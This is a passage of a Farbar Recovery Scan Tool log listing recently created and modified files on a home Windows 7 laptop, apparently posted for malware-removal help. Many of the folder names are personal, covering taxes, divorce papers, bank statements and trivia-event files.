2014-06-16 09:37 - 2009-12-29 16:36 - 00041280 _____ (Printing Communications Assoc., Inc. (PCAUSA)) C:\Windows\system32\Drivers\PCASp50a64.sys
2014-06-16 09:36 - 2014-06-16 09:36 - 00000000 ____D () C:\ProgramData\Novatel Wireless
2014-06-16 09:30 - 2014-06-16 09:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Wireless
2014-06-16 09:30 - 2014-06-16 09:30 - 00002310 _____ () C:\Users\Public\Desktop\Dell Mobile Broadband Manager.lnk
2014-06-16 09:24 - 2014-06-16 09:36 - 00000000 ____D () C:\Users\Ric\New folder
2014-06-16 09:18 - 2014-06-16 09:20 - 00000000 ____D () C:\Program Files\IDT
2014-06-16 09:18 - 2014-06-16 09:18 - 00000000 ____D () C:\Windows\system32\SRSLabs
2014-06-16 09:18 - 2010-01-21 04:10 - 12572672 _____ (IDT, Inc.) C:\Windows\system32\idtcpl64.cpl
2014-06-16 09:18 - 2010-01-21 04:10 - 03309568 _____ (IDT, Inc.) C:\Windows\system32\stlang64.dll
2014-06-16 09:18 - 2010-01-21 04:10 - 01472000 _____ (IDT, Inc.) C:\Windows\system32\stapo64.dll
2014-06-16 09:18 - 2010-01-21 04:10 - 00644608 ____N (IDT, Inc.) C:\Windows\system32\stapi64.dll
2014-06-16 09:18 - 2010-01-21 04:10 - 00564224 _____ (IDT, Inc.) C:\Windows\system32\idt64mp1.exe
2014-06-16 09:18 - 2010-01-21 04:10 - 00505856 _____ (IDT, Inc.) C:\Windows\system32\Drivers\stwrt64.sys
2014-06-16 09:18 - 2010-01-21 04:10 - 00431616 _____ (IDT, Inc.) C:\Windows\system32\stcplx64.dll
2014-06-16 09:18 - 2010-01-21 04:10 - 00209920 _____ (IDT, Inc.) C:\Windows\system32\st646267.dll
2014-06-16 09:18 - 2010-01-20 15:55 - 00601088 _____ (Creative Technology Ltd.) C:\Windows\system32\ctapo64.dll
2014-06-16 09:18 - 2010-01-20 15:55 - 00524288 _____ (Creative Technology Ltd.) C:\Windows\SysWOW64\ctapo32.dll
2014-06-16 09:18 - 2010-01-20 15:55 - 00524288 _____ (Creative Technology Ltd.) C:\Windows\system32\ctapo32.dll
2014-06-16 09:18 - 2010-01-12 02:03 - 00162304 _____ (Andrea Electronics Corporation) C:\Windows\system32\AESTAC64.dll
2014-06-16 09:18 - 2009-10-10 00:45 - 00442368 _____ (Andrea Electronics Corporation) C:\Windows\system32\AESTEC64.dll
2014-06-16 09:18 - 2009-05-13 03:28 - 00057856 _____ (Creative Technology Ltd.) C:\Windows\system32\ctppld64.dll
2014-06-16 09:18 - 2009-03-03 01:58 - 00068608 _____ (Andrea Electronics Corporation) C:\Windows\system32\AESTAR64.dll
2014-06-16 09:18 - 2009-03-03 01:47 - 00090624 _____ (Andrea Electronics Corporation) C:\Windows\system32\AESTCo64.dll
2014-06-16 09:13 - 2014-07-07 23:55 - 00003442 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-06-16 09:13 - 2014-07-07 23:55 - 00003204 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-06-16 09:13 - 2014-07-07 23:54 - 00003992 _____ () C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2014-06-16 09:12 - 2014-06-16 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-06-16 09:12 - 2014-06-16 09:12 - 00000000 ____D () C:\Program Files\My Dell
2014-06-16 09:09 - 2014-06-16 09:14 - 00000000 ____D () C:\temp
2014-06-16 08:57 - 2014-06-16 08:57 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell

==================== One Month Modified Files and Folders =======

2014-07-16 10:58 - 2014-07-16 10:53 - 00019485 _____ () C:\Users\Ric\Desktop\FRST.txt
2014-07-16 10:53 - 2014-07-16 10:48 - 00000000 ____D () C:\FRST
2014-07-16 10:49 - 2009-07-14 00:45 - 00013792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-07-16 10:49 - 2009-07-14 00:45 - 00013792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-07-16 10:47 - 2014-07-16 10:47 - 02086912 _____ (Farbar) C:\Users\Ric\Desktop\FRST64.exe
2014-07-16 10:46 - 2009-07-14 01:13 - 00006728 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-07-16 10:45 - 2011-02-25 23:12 - 01287798 _____ () C:\Windows\WindowsUpdate.log
2014-07-16 10:41 - 2014-06-07 19:57 - 00010430 _____ () C:\Windows\setupact.log
2014-07-16 10:41 - 2013-10-06 14:24 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-07-16 10:41 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-07-16 09:35 - 2012-03-31 11:56 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-07-16 09:16 - 2011-08-28 11:40 - 00000900 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA.job
2014-07-16 09:16 - 2011-03-25 16:29 - 00000000 ____D () C:\ProgramData\PCPitstop
2014-07-15 23:25 - 2014-07-15 23:25 - 00021104 _____ () C:\Users\Ric\Desktop\dds.txt
2014-07-15 23:25 - 2014-07-15 23:25 - 00013578 _____ () C:\Users\Ric\Desktop\attach.txt
2014-07-15 23:15 - 2013-10-06 14:24 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-07-15 23:04 - 2014-07-15 23:04 - 00688992 ____R (Swearware) C:\Users\Ric\Desktop\dds.com
2014-07-15 14:10 - 2011-02-25 21:53 - 00453480 _____ () C:\Users\Ric\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-14 13:32 - 2009-07-14 00:45 - 05809096 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-07-14 13:27 - 2011-02-26 12:01 - 00006728 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-07-14 13:16 - 2011-08-28 11:40 - 00000848 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core.job
2014-07-14 11:20 - 2014-07-14 11:20 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-DELL-XPS-1645-Microsoft-Windows-7-Professional-(64-bit).dat
2014-07-14 11:20 - 2014-07-14 11:20 - 00000000 ____D () C:\RegBackup
2014-07-14 11:00 - 2014-07-06 11:47 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-07-13 14:15 - 2013-02-14 10:26 - 00413824 _____ () C:\Windows\PFRO.log
2014-07-13 14:11 - 2014-07-06 14:17 - 00000000 ____D () C:\AdwCleaner
2014-07-13 13:30 - 2014-07-05 12:52 - 00000000 ____D () C:\Roy
2014-07-12 22:46 - 2011-02-26 14:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AOL
2014-07-12 22:46 - 2011-02-26 14:13 - 00000000 ____D () C:\ProgramData\AOL
2014-07-12 22:45 - 2014-07-12 12:44 - 00000004 _____ () C:\Windows\msoffice.ini
2014-07-12 22:45 - 2014-07-12 12:44 - 00000000 ____D () C:\Users\Ric\Desktop\AOL Saved PFC
2014-07-12 22:45 - 2011-02-26 14:14 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\AOL
2014-07-12 13:01 - 2014-07-11 14:58 - 00000000 ____D () C:\Kits
2014-07-12 12:22 - 2014-01-31 12:35 - 00000367 _____ () C:\dldt.log
2014-07-12 12:22 - 2011-02-25 21:59 - 00000000 ____D () C:\Program Files (x86)\Dell
2014-07-12 11:50 - 2012-10-31 11:16 - 00000990 _____ () C:\ProgramData\dlea.log
2014-07-12 11:50 - 2011-03-03 17:30 - 00274947 _____ () C:\ProgramData\dleascan.log
2014-07-11 16:25 - 2011-02-26 12:00 - 00000000 ____D () C:\Windows\en
2014-07-11 15:26 - 2014-07-11 15:26 - 00002358 _____ () C:\Users\Ric\Desktop\JRT.txt
2014-07-11 15:19 - 2014-07-11 15:19 - 00000000 ____D () C:\Windows\ERUNT
2014-07-11 14:26 - 2014-07-11 14:26 - 01166640 _____ () C:\Windows\Minidump\071114-42635-01.dmp
2014-07-11 14:26 - 2014-06-10 08:38 - 663370964 _____ () C:\Windows\MEMORY.DMP
2014-07-11 14:26 - 2011-04-01 13:13 - 00000000 ____D () C:\Windows\Minidump
2014-07-10 12:32 - 2009-07-13 23:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-07-09 17:57 - 2013-03-21 13:42 - 00000000 ____D () C:\Windows\pss
2014-07-09 15:34 - 2014-07-09 15:33 - 00000000 ____D () C:\Users\roy\1
2014-07-09 15:33 - 2014-07-05 14:22 - 00000000 ____D () C:\Users\roy
2014-07-07 23:57 - 2014-06-25 20:48 - 00003194 _____ () C:\Windows\System32\Tasks\{72E0739B-EEC6-4FAB-AD23-1B069503C4B5}
2014-07-07 23:56 - 2011-12-12 12:39 - 00003342 _____ () C:\Windows\System32\Tasks\{7677B741-0E06-4511-B4C6-F7582CC2898C}
2014-07-07 23:55 - 2014-06-16 09:13 - 00003442 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-07-07 23:55 - 2014-06-16 09:13 - 00003204 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-07-07 23:55 - 2011-02-26 00:21 - 00003940 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{05BF1867-8CD9-4C56-919F-A77D7EF5FBBD}
2014-07-07 23:54 - 2014-06-16 09:13 - 00003992 _____ () C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2014-07-07 23:45 - 2011-02-27 19:51 - 00000000 ____D () C:\ProgramData\Sonic
2014-07-07 23:44 - 2013-11-28 18:33 - 00000000 ____D () C:\Program Files\Google
2014-07-07 23:44 - 2012-01-02 14:21 - 00000000 ____D () C:\Program Files (x86)\Google
2014-07-07 23:43 - 2013-12-12 09:53 - 00000000 ____D () C:\Users\Ric\Documents\POOL
2014-07-07 23:35 - 2011-08-28 11:40 - 00000000 ____D () C:\Users\Ric\AppData\Local\Google
2014-07-07 22:27 - 2014-07-01 21:05 - 00000000 ____D () C:\Users\Ric\Desktop\Cohey photos
2014-07-07 22:27 - 2014-06-23 19:36 - 00000000 ____D () C:\Users\Ric\Desktop\EB PICS
2014-07-07 22:27 - 2014-06-20 21:25 - 00000000 ____D () C:\Users\Ric\Desktop\Mary picture folder
2014-07-07 22:27 - 2014-06-18 16:45 - 00000000 ____D () C:\Users\Ric\Documents\Divorce Civi lCover Sheet
2014-07-07 22:27 - 2014-06-16 16:04 - 00000000 ____D () C:\Users\Ric\Documents\Divorce folder
2014-07-07 22:27 - 2014-06-16 09:38 - 00000000 ____D () C:\ProgramData\QUALCOMM
2014-07-07 22:27 - 2014-06-14 15:08 - 00000000 ____D () C:\Users\Ric\Desktop\Square Pics
2014-07-07 22:27 - 2014-06-13 10:48 - 00000000 ____D () C:\Users\Ric\Desktop\Monkey Trip
2014-07-07 22:27 - 2014-06-11 07:32 - 00000000 ____D () C:\Users\Ric\Documents\Knott karaoke files
2014-07-07 22:27 - 2014-06-11 07:32 - 00000000 ____D () C:\Users\Ric\Documents\Fernandina and Friends Trivia Night 2014
2014-07-07 22:27 - 2014-06-03 11:38 - 00000000 ____D () C:\Users\Ric\AppData\Local\Intuit
2014-07-07 22:27 - 2014-06-01 16:23 - 00000000 ____D () C:\ProgramData\FitbitConnect
2014-07-07 22:27 - 2014-05-27 09:11 - 00000000 ____D () C:\Users\Ric\Documents\Mary divorce folder
2014-07-07 22:27 - 2014-05-21 07:51 - 00000000 ____D () C:\Users\Ric\Documents\Landale Hanlon Trivia Night 7-3-14
2014-07-07 22:27 - 2014-05-17 16:47 - 00000000 ____D () C:\Users\Ric\Documents\Ric's Extreme Bingo Parrty Cards
2014-07-07 22:27 - 2014-04-23 16:21 - 00000000 ____D () C:\Users\Ric\Documents\Chase statements
2014-07-07 22:27 - 2014-04-09 07:11 - 00000000 ____D () C:\Users\Ric\Documents\Ric's Extreme Bingo Traditional cards
2014-07-07 22:27 - 2014-04-05 18:35 - 00000000 ____D () C:\Users\Ric\Documents\Ric's Extreme Bingo Oldies cards
2014-07-07 22:27 - 2014-04-01 08:05 - 00000000 ____D () C:\Users\Ric\Documents\Villages Entertainment Blank W-9 and Square info
2014-07-07 22:27 - 2014-03-31 08:01 - 00000000 ____D () C:\Users\Ric\Documents\Villages Entertainment
2014-07-07 22:27 - 2014-03-23 18:47 - 00000000 ___HD () C:\Users\Ric\Documents\.picasaoriginals
2014-07-07 22:27 - 2014-03-17 17:34 - 00000000 ____D () C:\Users\Ric\Documents\BINGOEVENTpayout
2014-07-07 22:27 - 2014-03-13 17:18 - 00000000 ____D () C:\Users\Ric\Documents\Charlotte Club Music Trivia
2014-07-07 22:27 - 2014-02-28 12:18 - 00000000 ____D () C:\Users\Ric\Documents\Water Oak Trivia
2014-07-07 22:27 - 2014-02-26 10:00 - 00000000 ____D () C:\Users\Ric\Documents\Bingo Card Diagrams
2014-07-07 22:27 - 2014-02-24 09:23 - 00000000 ____D () C:\Users\Ric\Documents\2013 Tax Return Package Orlando
2014-07-07 22:27 - 2014-02-13 10:47 - 00000000 ____D () C:\Users\Ric\Documents\Celebration Athletes app licationRicMitchellw92013
2014-07-07 22:27 - 2013-12-19 13:03 - 00000000 ____D () C:\Users\Ric\Documents\2013 Tax Package Orlando
2014-07-07 22:27 - 2013-09-24 12:02 - 00000000 ____D () C:\Users\Ric\AppData\Local\CE614ED5-C555-4E18-B719-E22F8ED8BAE5.aplzod
2014-07-07 22:27 - 2013-08-04 14:51 - 00000000 ____D () C:\Users\Ric\Documents\POLO RIDGE TRIVIA
2014-07-07 22:27 - 2013-08-04 14:51 - 00000000 ____D () C:\Users\Ric\Documents\MALLORY TRIVIA
2014-07-07 22:27 - 2013-08-04 14:51 - 00000000 ____D () C:\Users\Ric\Documents\Citrus Hill Music File questions
2014-07-07 22:27 - 2013-06-02 16:22 - 00000000 ____D () C:\Users\Ric\Documents\Landale Hanlon Trivia Night 7-3-13
2014-07-07 22:27 - 2013-05-30 09:19 - 00000000 ____D () C:\Users\Ric\AppData\Local\Amazon Cloud Player
2014-07-07 22:27 - 2013-05-23 17:28 - 00000000 ___HD () C:\ProgramData\CanonBJ
2014-07-07 22:27 - 2013-04-12 17:36 - 00000000 ____D () C:\Users\Ric\Documents\Trivia_Ladder_Trivia_Sets
2014-07-07 22:27 - 2013-03-26 09:18 - 00000000 ____D () C:\Users\Ric\Documents\Theatre ALLBIOS
2014-07-07 22:27 - 2013-03-06 09:41 - 00000000 ____D () C:\Users\Ric\Documents\Sharon ApplicationforResidency
2014-07-07 22:27 - 2013-02-05 10:04 - 00000000 ____D () C:\Users\Ric\Documents\Ric Mitchell Q&A OnlineTriviaInsert
2014-07-07 22:27 - 2013-01-22 09:19 - 00000000 ___HD () C:\Users\Ric\Desktop\.picasaoriginals
2014-07-07 22:27 - 2012-12-11 08:53 - 00000000 ____D () C:\Users\Ric\Documents\2012 Tax Return and Packet
2014-07-07 22:27 - 2012-11-15 13:45 - 00000000 ____D () C:\Users\Ric\Documents\ACX
2014-07-07 22:27 - 2012-11-04 17:12 - 00000000 ____D () C:\Users\Ric\Documents\Scott Trivia Documnets
2014-07-07 22:27 - 2012-10-18 09:17 - 00000000 ____D () C:\Users\Ric\AppData\Local\Quicken WillMaker Plus 2013
2014-07-07 22:27 - 2012-08-30 09:24 - 00000000 ____D () C:\Users\Ric\Documents\Cathleen book IllustrationsSoFarLoRes
2014-07-07 22:27 - 2012-08-29 13:47 - 00000000 ____D () C:\Users\Ric\Documents\VillagesBacallRecinvoiceSockHop
2014-07-07 22:27 - 2012-08-27 09:01 - 00000000 ____D () C:\Users\Ric\Documents\Cigna Medical Forms
2014-07-07 22:27 - 2012-08-05 18:39 - 00000000 ____D () C:\Users\Ric\Documents\Amazon MP3
2014-07-07 22:27 - 2012-07-30 18:09 - 00000000 ____D () C:\Users\Ric\Documents\Cathleen book
2014-07-07 22:27 - 2012-06-17 15:48 - 00000000 ____D () C:\Users\Ric\Documents\TOPHITSOF1981
2014-07-07 22:27 - 2012-05-30 07:34 - 00000000 ____D () C:\Users\Ric\Documents\W-9 Form-2011 Blank
2014-07-07 22:27 - 2012-04-07 07:51 - 00000000 ____D () C:\Users\Ric\Documents\1940 UnitedStatesFederalCensus(Beta)
2014-07-07 22:27 - 2012-02-22 11:12 - 00000000 ____D () C:\Users\Ric\Documents\Moving notes
2014-07-07 22:27 - 2012-02-22 11:12 - 00000000 ____D () C:\Users\Ric\Documents\2011 Tax package Orlando
2014-07-07 22:27 - 2012-02-06 20:07 - 00000000 ____D () C:\Users\Ric\Documents\Drew Addtional files
2014-07-07 22:27 - 2012-01-26 10:23 - 00000000 ____D () C:\Users\Ric\Documents\Consumer Cellular
2014-07-07 22:27 - 2012-01-19 17:12 - 00000000 ____D () C:\Users\Ric\Documents\Daily Sun ads
2014-07-07 22:27 - 2012-01-14 13:54 - 00000000 ___SD () C:\Users\Ric\Documents\My Data Sources
2014-07-07 22:27 - 2012-01-11 10:45 - 00000000 ____D () C:\Users\Ric\Documents\Ameriprise statements
2014-07-07 22:27 - 2011-12-22 09:51 - 00000000 ____D () C:\Users\Ric\Documents\Rental lease 2
2014-07-07 22:27 - 2011-10-19 12:00 - 00000000 ____D () C:\Users\Ric\Desktop\TheGameShowManLogo1
2014-07-07 22:27 - 2011-10-13 12:24 - 00000000 ____D () C:\Users\Ric\AppData\Local\Quicken WillMaker Plus 2012
2014-07-07 22:27 - 2011-09-03 09:39 - 00000000 ____D () C:\Users\Ric\Documents\Amazon MP3 Uploader
2014-07-07 22:27 - 2011-08-17 16:07 - 00000000 ____D () C:\Users\Ric\Documents\2009D'AMICO tax return
2014-07-07 22:27 - 2011-03-13 15:17 - 00000000 ____D () C:\Users\Ric\Documents\skoop special
2014-07-07 22:27 - 2011-03-10 16:09 - 00000000 ____D () C:\Users\Ric\AppData\Local\Broderbund Software
2014-07-07 22:27 - 2011-03-05 14:00 - 00000000 ___RD () C:\Users\Ric\Documents\My Dropbox
2014-07-07 22:27 - 2011-03-05 14:00 - 00000000 ____D () C:\Users\Ric\Documents\BlackBerry
2014-07-07 22:27 - 2011-03-05 14:00 - 00000000 ____D () C:\Users\Ric\Desktop\Website text and files
2014-07-07 22:27 - 2011-03-05 13:46 - 00000000 ____D () C:\Users\Ric\Carbonite Restored OLD User Settings
2014-07-07 22:27 - 2011-03-05 13:46 - 00000000 ____D () C:\Users\Public\Documents\yoostar
2014-07-07 22:27 - 2011-03-03 17:13 - 00000000 ____D () C:\Users\Ric\Documents\DAmico-Fitzgerald Tax Return 2010
2014-07-07 22:27 - 2011-03-01 14:05 - 00000000 ____D () C:\Users\Ric\Documents\Ric Mary Pics
2014-07-07 22:27 - 2011-02-28 18:19 - 00000000 ____D () C:\Users\Ric\Documents\skoop
2014-07-07 22:27 - 2011-02-28 09:14 - 00000000 ____D () C:\ProgramData\McAfee
2014-07-07 22:27 - 2011-02-27 20:26 - 00000000 ____D () C:\Users\Ric\AppData\Local\CatalystMC
2014-07-07 22:27 - 2011-02-27 19:46 - 00000000 ____D () C:\ProgramData\PhotoShow Shared Assets
2014-07-07 22:27 - 2011-02-27 15:24 - 00000000 ____D () C:\Users\Ric\Documents\Dell WebCam Central
2014-07-07 22:27 - 2011-02-26 18:06 - 00000000 ____D () C:\Users\Ric\Documents\Bank of America
2014-07-07 22:27 - 2011-02-26 17:49 - 00000000 ___RD () C:\Users\Ric\Dropbox
2014-07-07 22:27 - 2011-02-26 17:45 - 00000000 ____D () C:\ProgramData\Intuit
2014-07-07 22:27 - 2011-02-26 14:13 - 00000000 ____D () C:\Users\Ric\AppData\Local\AOL
2014-07-07 22:27 - 2011-02-26 13:26 - 00000000 ____D () C:\Users\Ric\Documents\Outlook Files
2014-07-07 22:27 - 2011-02-26 01:39 - 00000000 ____D () C:\ProgramData\Logishrd
2014-07-07 22:27 - 2011-02-26 01:21 - 00000000 ____D () C:\Users\Ric\Documents\Adobe
2014-07-07 22:27 - 2011-02-26 00:59 - 00000000 ____D () C:\Users\Public\Documents\Adobe
2014-07-07 22:27 - 2011-02-26 00:34 - 00000000 ____D () C:\Users\Ric\AppData\Local\Apple Computer
2014-07-07 22:27 - 2011-02-25 21:20 - 00000000 ____D () C:\Users\Ric
2014-07-07 12:45 - 2014-02-06 09:50 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\vlc
2014-07-07 12:45 - 2011-09-03 09:39 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\com.amazon.music.uploader
2014-07-07 12:45 - 2011-05-25 13:27 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Dell
2014-07-07 12:45 - 2011-03-01 17:08 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\eFax Messenger
2014-07-07 12:45 - 2011-02-27 20:00 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Roxio
2014-07-07 12:45 - 2011-02-26 17:47 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Dropbox
2014-07-07 12:45 - 2011-02-26 17:46 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Intuit
2014-07-07 12:45 - 2011-02-26 17:44 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Tether
2014-07-07 12:45 - 2011-02-26 16:55 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Real
2014-07-07 12:45 - 2011-02-26 14:38 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\PACE Anti-Piracy
2014-07-07 12:45 - 2011-02-26 00:09 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\PCDr
2014-07-07 12:42 - 2013-05-25 14:16 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\ArcSoft
2014-07-07 12:42 - 2013-05-23 17:51 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\canon
2014-07-07 12:42 - 2011-04-04 11:35 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Amazon
2014-07-07 12:42 - 2011-02-26 00:45 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Adobe
2014-07-07 12:42 - 2011-02-26 00:34 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Apple Computer
2014-07-07 12:19 - 2011-02-27 10:02 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1
2014-07-06 14:15 - 2014-07-06 14:15 - 00000000 ____D () C:\Users\Ric\AppData\Local\GHISLER
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieUserList
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieSiteList
2014-07-06 13:39 - 2014-06-25 19:50 - 00000000 ____D () C:\ProgramData\IculOnse
2014-07-06 13:39 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-07-06 11:46 - 2014-07-06 11:46 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-07-05 22:06 - 2014-07-05 22:06 - 00000000 ____D () C:\Users\roy\AppData\Local\GHISLER
2014-07-05 22:04 - 2014-07-05 22:04 - 00000736 _____ () C:\Users\Public\Desktop\Total Commander 64 bit.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000722 _____ () C:\Users\Public\Desktop\Total Commander.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total Commander
2014-07-05 14:46 - 2014-07-05 14:46 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Notepad++
2014-07-05 14:25 - 2014-07-05 14:25 - 00453480 _____ () C:\Users\roy\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-05 14:23 - 2014-07-05 14:23 - 00001417 _____ () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Apple Computer
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Adobe
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Local\Google
2014-07-05 14:22 - 2014-07-05 14:22 - 00000020 ___SH () C:\Users\roy\ntuser.ini
2014-07-05 14:22 - 2014-07-05 14:22 - 00000000 ____D () C:\Users\roy\AppData\Local\VirtualStore
2014-07-05 14:17 - 2014-01-08 09:57 - 00035352 _____ () C:\Users\Ric\Downloads\Jay and The Americans    March 2014.xls
2014-07-05 14:17 - 2011-10-24 12:08 - 01349912 _____ () C:\Users\Ric\Downloads\header.fla
2014-07-05 14:16 - 2013-07-26 15:28 - 00028952 _____ () C:\Users\Ric\Downloads\Garrett Miles MUSIC & MAYHEM   Sept 2013.xls
2014-07-05 14:16 - 2013-07-26 15:28 - 00028952 _____ () C:\Users\Ric\Downloads\Garrett Miles MUSIC & MAYHEM   Sept 2013 (1).xls
2014-07-05 13:53 - 2014-07-05 13:53 - 00139544 ____H () C:\Users\Ric\Downloads\Donna Summer - Last Dance.mp3.z1a
2014-07-05 13:53 - 2014-01-08 09:58 - 00028440 _____ () C:\Users\Ric\Downloads\Brooklyn Bridge the  March 2014.xls
2014-07-05 13:53 - 2014-01-08 09:58 - 00028440 _____ () C:\Users\Ric\Downloads\Brooklyn Bridge the  March 2014 (1).xls
2014-07-05 13:53 - 2011-03-09 16:32 - 00034328 _____ () C:\Users\Ric\Documents\watermark[540].tga
2014-07-05 13:53 - 2011-03-09 16:32 - 00018712 _____ () C:\Users\Ric\Documents\watermark[396].tga
2014-07-05 13:53 - 2011-03-09 16:32 - 00009752 _____ () C:\Users\Ric\Documents\watermark[288].tga
2014-07-05 13:49 - 2012-09-22 12:31 - 00022040 _____ () C:\Users\Ric\Documents\TOPHITSOF1973.xls
2014-07-05 13:49 - 2012-05-21 09:14 - 00023576 _____ () C:\Users\Ric\Documents\TOPHITSOF1968.xls
2014-07-05 13:49 - 2012-01-14 09:52 - 00009240 _____ () C:\Users\Ric\Documents\Team Trivia Board.xlsx
2014-07-05 13:49 - 2011-03-17 14:55 - 13156376 _____ () C:\Users\Ric\Documents\SUNY speech.pptx
2014-07-05 13:48 - 2012-05-28 07:48 - 00023576 _____ () C:\Users\Ric\Documents\SUMMERSONGS.xls
2014-07-05 13:48 - 2011-10-28 15:25 - 00039192 _____ () C:\Users\Ric\Documents\Star Phone Listing.xls
2014-07-05 13:48 - 2011-04-17 13:39 - 13158168 _____ () C:\Users\Ric\Documents\SUNY speech FINAL.pptx
2014-07-05 13:47 - 2012-08-04 13:59 - 00027416 _____ () C:\Users\Ric\Documents\ROOTSOFROCKNROLL.xls
2014-07-05 13:46 - 2011-09-21 17:53 - 00875288 _____ () C:\Users\Ric\Documents\Rickaraoketextfile.xls
2014-07-05 13:41 - 2012-09-23 13:25 - 08316373 ____T () C:\Users\Ric\Documents\Ric Pre Show Powerpoint.wmv
2014-07-05 13:41 - 2012-09-23 13:03 - 01148184 _____ () C:\Users\Ric\Documents\Ric Pre Show Powerpoint.pptx
2014-07-05 13:39 - 2013-08-24 17:25 - 00022552 _____ () C:\Users\Ric\Documents\PartyBaseVillages 2014.xlsx
2014-07-05 13:39 - 2013-05-15 10:02 - 00080920 _____ () C:\Users\Ric\Documents\PartyBaseVillages 2013-Part 2.xls
2014-07-05 13:39 - 2013-01-07 10:49 - 00082968 _____ () C:\Users\Ric\Documents\PartyBaseVillages 2012.xls
2014-07-05 13:39 - 2012-08-24 09:47 - 00012312 _____ () C:\Users\Ric\Documents\Red Hat.xlsx
2014-07-05 13:39 - 2012-04-24 11:46 - 00077080 _____ () C:\Users\Ric\Documents\PartyBaseVillages2.xls
2014-07-05 13:39 - 2012-01-06 10:55 - 00081944 _____ () C:\Users\Ric\Documents\PartyBaseVillages.xls
2014-07-05 13:39 - 2011-02-27 12:18 - 00407832 _____ () C:\Users\Ric\Documents\PartyBase.xlr
2014-07-05 13:36 - 2012-08-17 08:48 - 00013080 _____ () C:\Users\Ric\Documents\LadiesLuncheonRoster with birthdays.xlsx
2014-07-05 13:36 - 2012-08-16 11:09 - 00013336 _____ () C:\Users\Ric\Documents\LadiesLuncheonRoster.xlsx
2014-07-05 13:36 - 2012-07-03 17:35 - 00032792 _____ () C:\Users\Ric\Documents\Knott Take It Or Leave It.xlsx
2014-07-05 13:36 - 2012-07-03 16:54 - 00032536 _____ () C:\Users\Ric\Documents\Knott Blank amended Ric Trivia sheet for multiple teams-.xlsx
